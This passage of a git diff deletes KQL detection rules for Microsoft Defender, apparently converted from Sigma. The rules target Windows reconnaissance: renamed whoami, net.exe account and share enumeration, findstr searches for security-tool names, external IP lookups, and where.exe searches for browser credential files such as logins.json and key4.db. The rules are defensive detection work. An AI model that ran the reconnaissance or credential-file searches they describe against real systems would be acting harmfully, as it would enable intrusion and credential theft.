-// Level: medium
-// Description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field
-// Tags: attack.defense_evasion, attack.collection, attack.command_and_control, attack.discovery, attack.s0592
-DeviceProcessEvents
-| where ProcessVersionInfoProductName =~ "Remote Utilities" and (not((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe")))
\ No newline at end of file
diff --git a/Discovery/Renamed_Whoami_Execution.kql b/Discovery/Renamed_Whoami_Execution.kql
deleted file mode 100644
index a0f2b785..00000000
--- a/Discovery/Renamed_Whoami_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/12
-// Level: critical
-// Description: Detects the execution of whoami that has been renamed to a different name to avoid detection
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "whoami.exe" and (not(FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql b/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
deleted file mode 100644
index 7cd541b4..00000000
--- a/Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/05
-// Level: high
-// Description: Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /priv" or ProcessCommandLine contains " -priv") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql b/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql
deleted file mode 100644
index 8d531a86..00000000
--- a/Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2023/10/20
-// Level: medium
-// Description: Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter out the results.
-This detection focuses on the keywords that the attacker might use as a filter.
-
-// Tags: attack.discovery, attack.t1518.001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " avira" or ProcessCommandLine endswith " avira\"" or ProcessCommandLine endswith " cb" or ProcessCommandLine endswith " cb\"" or ProcessCommandLine endswith " cylance" or ProcessCommandLine endswith " cylance\"" or ProcessCommandLine endswith " defender" or ProcessCommandLine endswith " defender\"" or ProcessCommandLine endswith " kaspersky" or ProcessCommandLine endswith " kaspersky\"" or ProcessCommandLine endswith " kes" or ProcessCommandLine endswith " kes\"" or ProcessCommandLine endswith " mc" or ProcessCommandLine endswith " mc\"" or ProcessCommandLine endswith " sec" or ProcessCommandLine endswith " sec\"" or ProcessCommandLine endswith " sentinel" or ProcessCommandLine endswith " sentinel\"" or ProcessCommandLine endswith " symantec" or ProcessCommandLine endswith " symantec\"" or ProcessCommandLine endswith " virus" or ProcessCommandLine endswith " virus\"") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql b/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql
deleted file mode 100644
index 4dbec23f..00000000
--- a/Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Endgame, JHasenbusch (ported for oscd.community)
-// Date: 2018/10/30
-// Level: low
-// Description: Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
-// Tags: attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "view" and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))) and (not(ProcessCommandLine contains "\\\\"))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Execution_of_Hostname.kql b/Discovery/Suspicious_Execution_of_Hostname.kql
deleted file mode 100644
index be1ee918..00000000
--- a/Discovery/Suspicious_Execution_of_Hostname.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Use of hostname to get information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where FolderPath endswith "\\HOSTNAME.EXE"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Execution_of_Systeminfo.kql b/Discovery/Suspicious_Execution_of_Systeminfo.kql
deleted file mode 100644
index e6aa3bdf..00000000
--- a/Discovery/Suspicious_Execution_of_Systeminfo.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Detects usage of the "systeminfo" command to retrieve information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where FolderPath endswith "\\systeminfo.exe" or ProcessVersionInfoOriginalFileName =~ "sysinfo.exe"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql b/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql
deleted file mode 100644
index 45d9b7ac..00000000
--- a/Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE
-Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
-
-// Tags: attack.discovery, attack.t1087.001, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) and ((((ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto" or ProcessCommandLine contains " /do") and (ProcessCommandLine contains " group " or ProcessCommandLine contains " localgroup ")) and (not(ProcessCommandLine contains " /add"))) or (ProcessCommandLine contains " /do" and ProcessCommandLine contains " accounts "))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql b/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql
deleted file mode 100644
index 34357fc4..00000000
--- a/Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/12/28
-// Level: high
-// Description: Detects suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "syscall:::return" and ProcessCommandLine contains "lkd(") or (ProcessCommandLine contains "lkd(0)" and FolderPath endswith "\\dtrace.exe")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Network_Command.kql b/Discovery/Suspicious_Network_Command.kql
deleted file mode 100644
index 1125f58f..00000000
--- a/Discovery/Suspicious_Network_Command.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021/12/07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1016
-DeviceProcessEvents
-| where ProcessCommandLine contains "ipconfig /all" or ProcessCommandLine contains "netsh interface show interface" or ProcessCommandLine contains "arp -a" or ProcessCommandLine contains "nbtstat -n" or ProcessCommandLine contains "net config" or ProcessCommandLine contains "route print"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql b/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql
deleted file mode 100644
index 2324716d..00000000
--- a/Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/24
-// Level: medium
-// Description: Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity.
-// Tags: attack.discovery, attack.t1016
-DeviceNetworkEvents
-| where ((RemoteUrl in~ ("www.ip.cn", "l2.io")) or (RemoteUrl contains "api.2ip.ua" or RemoteUrl contains "api.bigdatacloud.net" or RemoteUrl contains "api.ipify.org" or RemoteUrl contains "bot.whatismyipaddress.com" or RemoteUrl contains "canireachthe.net" or RemoteUrl contains "checkip.amazonaws.com" or RemoteUrl contains "checkip.dyndns.org" or RemoteUrl contains "curlmyip.com" or RemoteUrl contains "db-ip.com" or RemoteUrl contains "edns.ip-api.com" or RemoteUrl contains "eth0.me" or RemoteUrl contains "freegeoip.app" or RemoteUrl contains "geoipy.com" or RemoteUrl contains "getip.pro" or RemoteUrl contains "icanhazip.com" or RemoteUrl contains "ident.me" or RemoteUrl contains "ifconfig.io" or RemoteUrl contains "ifconfig.me" or RemoteUrl contains "ip-api.com" or RemoteUrl contains "ip.360.cn" or RemoteUrl contains "ip.anysrc.net" or RemoteUrl contains "ip.taobao.com" or RemoteUrl contains "ip.tyk.nu" or RemoteUrl contains "ipaddressworld.com" or RemoteUrl contains "ipapi.co" or RemoteUrl contains "ipconfig.io" or RemoteUrl contains "ipecho.net" or RemoteUrl contains "ipinfo.io" or RemoteUrl contains "ipip.net" or RemoteUrl contains "ipof.in" or RemoteUrl contains "ipv4.icanhazip.com" or RemoteUrl contains "ipv4bot.whatismyipaddress.com" or RemoteUrl contains "ipv6-test.com" or RemoteUrl contains "ipwho.is" or RemoteUrl contains "jsonip.com" or RemoteUrl contains "myexternalip.com" or RemoteUrl contains "seeip.org" or RemoteUrl contains "wgetip.com" or RemoteUrl contains "whatismyip.akamai.com" or RemoteUrl contains "whois.pconline.com.cn" or RemoteUrl contains "wtfismyip.com"))
and (not((InitiatingProcessFolderPath endswith "\\brave.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Query_of_MachineGUID.kql b/Discovery/Suspicious_Query_of_MachineGUID.kql
deleted file mode 100644
index 220d7db0..00000000
--- a/Discovery/Suspicious_Query_of_MachineGUID.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/01/01
-// Level: low
-// Description: Use of reg to get MachineGuid information
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql b/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql
deleted file mode 100644
index 6dcb8c45..00000000
--- a/Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/10/10
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
-// Tags: attack.discovery, attack.t1087.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql b/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
deleted file mode 100644
index 62278102..00000000
--- a/Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-DeviceProcessEvents
-| where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Scan_Loop_Network.kql b/Discovery/Suspicious_Scan_Loop_Network.kql
deleted file mode 100644
index 19d4fbec..00000000
--- a/Discovery/Suspicious_Scan_Loop_Network.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/03/12
-// Level: medium
-// Description: Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
-// Tags: attack.execution, attack.t1059, attack.discovery, attack.t1018
-DeviceProcessEvents
-| where (ProcessCommandLine contains "for " or ProcessCommandLine contains "foreach ") and (ProcessCommandLine contains "nslookup" or ProcessCommandLine contains "ping")
\ No newline at end of file
diff --git a/Discovery/Suspicious_Use_of_PsLogList.kql b/Discovery/Suspicious_Use_of_PsLogList.kql
deleted file mode 100644
index b0aeb239..00000000
--- a/Discovery/Suspicious_Use_of_PsLogList.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/18
-// Level: medium
-// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
-// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe"))
\ No newline at end of file
diff --git a/Discovery/Suspicious_Where_Execution.kql b/Discovery/Suspicious_Where_Execution.kql
deleted file mode 100644
index ac7bc0f8..00000000
--- a/Discovery/Suspicious_Where_Execution.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/12/13
-// Level: low
-// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
-Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
-internal network resources such as servers, tools/dashboards, or other related infrastructure.
-
-// Tags: attack.discovery, attack.t1217
-DeviceProcessEvents
-| where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data")
\ No newline at end of file
diff --git a/Discovery/Sysinternals_PsService_Execution.kql b/Discovery/Sysinternals_PsService_Execution.kql
deleted file mode 100644
index f02b57a4..00000000
--- a/Discovery/Sysinternals_PsService_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/16
-// Level: medium
-// Description: Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "psservice.exe" or (FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe")
\ No newline at end of file
diff --git a/Discovery/Sysinternals_PsSuspend_Execution.kql b/Discovery/Sysinternals_PsSuspend_Execution.kql
deleted file mode 100644
index fe4d7335..00000000
--- a/Discovery/Sysinternals_PsSuspend_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/23
-// Level: medium
-// Description: Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
-// Tags: attack.discovery, attack.persistence, attack.t1543.003
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")
\ No newline at end of file
diff --git a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql b/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql
deleted file mode 100644
index 8bbe1a9b..00000000
--- a/Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/16
-// Level: high
-// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
-// Tags: attack.discovery, attack.t1518.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index e0972b4b..00000000
--- a/Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Stephen Lincoln `@slincoln-aiq`(AttackIQ)
-// Date: 2024/02/02
-// Level: medium
-// Description: An adversary might use WMI to discover information about the system, such as the volume name, size,
-free space, and other disk information. This can be done using the `wmic` command-line utility and has been
-observed being used by threat actors such as Volt Typhoon.
-
-// Tags: attack.execution, attack.discovery, attack.t1047, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "volume" or ProcessCommandLine contains "path win32_logicaldisk") and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql b/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql
deleted file mode 100644
index 6728dc2d..00000000
--- a/Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: low
-// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
-// Tags: attack.discovery, attack.t1049
-DeviceProcessEvents
-| where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql b/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql
deleted file mode 100644
index de756d78..00000000
--- a/Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: TropChaud
-// Date: 2023/01/26
-// Level: medium
-// Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,
-including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,
-and GPU driver products/versions.
-Some of these commands were used by Aurora Stealer in late 2022/early 2023.
-
-// Tags: attack.discovery, attack.t1082
-DeviceProcessEvents
-| where (ProcessCommandLine contains "LOGICALDISK get Name,Size,FreeSpace" or ProcessCommandLine contains "os get Caption,OSArchitecture,Version") and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Discovery/Use_of_W32tm_as_Timer.kql b/Discovery/Use_of_W32tm_as_Timer.kql
deleted file mode 100644
index 4e1a4aef..00000000
--- a/Discovery/Use_of_W32tm_as_Timer.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/09/25
-// Level: high
-// Description: When configured with suitable command line arguments, w32tm can act as a delay mechanism
-// Tags: attack.discovery, attack.t1124
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/stripchart" and ProcessCommandLine contains "/computer:" and ProcessCommandLine contains "/period:" and ProcessCommandLine contains "/dataonly" and ProcessCommandLine contains "/samples:") and (FolderPath endswith "\\w32tm.exe" or ProcessVersionInfoOriginalFileName =~ "w32time.dll")
\ No newline at end of file
diff --git a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql b/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql
deleted file mode 100644
index e31beff7..00000000
--- a/Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/09
-// Level: medium
-// Description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADUser " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Discovery/WhoAmI_as_Parameter.kql b/Discovery/WhoAmI_as_Parameter.kql
deleted file mode 100644
index f6fc51e8..00000000
--- a/Discovery/WhoAmI_as_Parameter.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/11/29
-// Level: high
-// Description: Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ProcessCommandLine contains ".exe whoami"
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_Anomaly.kql b/Discovery/Whoami.EXE_Execution_Anomaly.kql
deleted file mode 100644
index 67453cb8..00000000
--- a/Discovery/Whoami.EXE_Execution_Anomaly.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/08/12
-// Level: medium
-// Description: Detects the execution of whoami.exe with suspicious parent processes.
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") and (not(((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") or InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) and (not(InitiatingProcessFolderPath endswith ":\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe"))
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql b/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql
deleted file mode 100644
index 35ff8ce9..00000000
--- a/Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Teymur Kheirkhabarov
-// Date: 2022/01/28
-// Level: high
-// Description: Detects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
-// Tags: attack.privilege_escalation, attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessVersionInfoOriginalFileName =~ "whoami.exe" or FolderPath endswith "\\whoami.exe") and (AccountName contains "AUTHORI" or AccountName contains "AUTORI" or AccountName contains "TrustedInstaller")
\ No newline at end of file
diff --git a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql b/Discovery/Whoami.EXE_Execution_With_Output_Option.kql
deleted file mode 100644
index dfb76c22..00000000
--- a/Discovery/Whoami.EXE_Execution_With_Output_Option.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " /FO CSV" or ProcessCommandLine contains " -FO CSV") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")) or ProcessCommandLine =~ "*whoami*>*"
\ No newline at end of file
diff --git a/Discovery/Whoami_Utility_Execution.kql b/Discovery/Whoami_Utility_Execution.kql
deleted file mode 100644
index 674c5dcc..00000000
--- a/Discovery/Whoami_Utility_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2018/08/13
-// Level: low
-// Description: Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe"
\ No newline at end of file
diff --git a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql b/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
deleted file mode 100644
index 5a91ee73..00000000
--- a/Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/23
-// Level: high
-// Description: Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.
-// Tags: attack.execution, attack.reconnaissance, attack.discovery, attack.credential_access, attack.impact
-DeviceProcessEvents
